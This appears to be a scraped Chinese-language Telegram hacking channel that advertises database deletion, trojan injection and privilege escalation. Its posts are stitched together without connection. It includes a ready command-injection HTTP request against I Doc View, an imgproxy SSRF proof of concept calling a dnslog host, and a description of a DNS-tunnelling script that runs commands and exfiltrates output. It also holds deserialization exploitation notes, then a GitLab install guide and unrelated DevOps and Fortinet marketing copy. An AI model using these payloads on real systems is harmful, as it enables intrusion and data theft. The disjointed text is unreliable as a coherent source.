红客解密程序 暗网编程
27.6K subscribers
966 photos
12 videos
1 file
56 links
渗透测试,#删库,数据删除 拿数据库 木马注入 破解,提权,Dns动持
Download Telegram
fireeye.ps1是一个巧妙利用DNS请求来接收命令和传输数据的脚本。总体行为如下:

获取用于标识身份的ID

通过获取DNS解析的IP地址 ,每次接收4个字节,写入批处理文件中

执行批处理文件,输出结果到TXT文件

发送TXT到服务器

清理痕迹
Java在反序列化时使用ObjectInputStream类,这个类实现了DataInput接口,这个接口定义了读取字符串的方法readUTF。在解码中,Java实际实现的是一个魔改过的UTF-8编码,名为“Modified UTF-8”
其原理就是GlassFish在路径解码时使用UTF-8编码,很典型的Overlong Encoding利用
I Doc View在线文档预览系统 命令执行漏洞

POST /system/cmd.json HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 127.0.0.1
Content-Length: 31
Expect: 100-continue
Connection: close

cmd=echo+%26+%28whoami%29+%26
method方法特殊语法

caller
当前节点的调用位置方法,比如cpg.method("start").caller就会返回codeInject方法

callIn
当前方法/函数节点的调用位置,比如cpg.method("start").callIn就会返回调用start方法的call节点

cpg.method(“start”)
名为start的方法的定义节点
朴实无华,但是在实际写的时候发现了问题。直接调用GetObjectData,则会调用该函数来序列化,binaryformatter也是一样
Imgproxy服务器端请求伪造漏洞
imgproxy <=3.14.0 poc

url /111/rs:fit:400:400:0:0/plain/http://xxxx.dnslog.cn
硬件推荐配置
sudo yum install -y curl policycoreutils-python openssh-server perl
# 如果没有成功,可以重启一下虚拟机再去安装
sudo systemctl enable sshd
sudo systemctl start sshd

curl -fsSL https://packages.gitlab.cn/repository/raw/scripts/setup.sh | /bin/bash


sudo EXTERNAL_URL="http://192.168.48.131" yum install -y gitlab-jh
# 192.168.48.131这个地址是安装者本人的虚拟机地址
1
DevOps 宏观大屏直观展示关键指标,实时监控项目进度、代码质量等数据,为决策提供依据,驱动企业数据化转型
禅道DevOps内置了开箱即用的代码库应用(GiFox、GitLab),与禅道项目管理软件默认打通,构建起无缝对接的代码管理流程,帮助团队更好地进行集成和持续部署
通过禅道DevOps的制品库,用户可实现构建产物的版本管理、依赖管理和重复使用。



此外,还支持自动化部署、持续交付和容器化部署等,为团队提供了高效地管理、分发构建产物
禅道DevOps能帮助团队打造质量门禁持续交付流水线。研发团队可建立高效的流水线,以实现更高效、更快速、更可靠的软件开发和交付过程
该功能将研发流程的各环境阶段流转内化至持续交付流水线,管理总线落地到工程总线,真正实现流程与工具结合
上线计划有助于提高团队的效率、降低风险并推动持续改进,实现了软件从计划制定到发布监控的全流程管理,严格审批确保变更可控
FortiGate Rugged 新世代防火牆 NGFW 執行 FortiOS,FortiOS 是 Fortinet Security Fabric 的基礎。這使得所有 IT 和 OT 網路能夠實現統一的網路與安全性,以確保一致的策略和協調。FortiGate Rugged 系列可讓您控制所有連線的裝置、應用程式和使用者。FortiGuard 工業安全服務提供專門的入侵防護系統 (IPS) 特徵碼,以偵測及攔截製造、工廠、安全和營運技術 (OT) 環境中針對應用程式和裝置的惡意流量
新世代防火牆 NGFW 是一體化安全設備,提供企業級威脅防護功能,可協助關鍵工業網路抵禦網路威脅。這些堅固耐用的防火牆符合全球 70 多個行業標準,而且滿足各種工業應用程式和通訊協定的安全需求,提供簡單、經濟且易於部署的解決方案,以安全地互連關鍵基礎設施和使用者,因此是 OT 企業的理想選擇
Fortinet 安全存取服務邊緣 (SASE) 提供所有 SASE 核心功能、業界最靈活的連接功能(包括存取點、有線交換網路、代理和無代理裝置),以及擁有統一管理、端到端數位體驗監控(DEM)的智慧 AI 整合,並對內部部署和雲端實施零信任的一致安全原則。此外,透過 Fortinet 安全存取服務邊緣,您可以適應任何客戶環境,無論是內部部署、雲端抑或是混合環境都能輕鬆駕馭。為 BYOD 和承包商提供安全的網頁存取,並增強 SD-WAN 可視性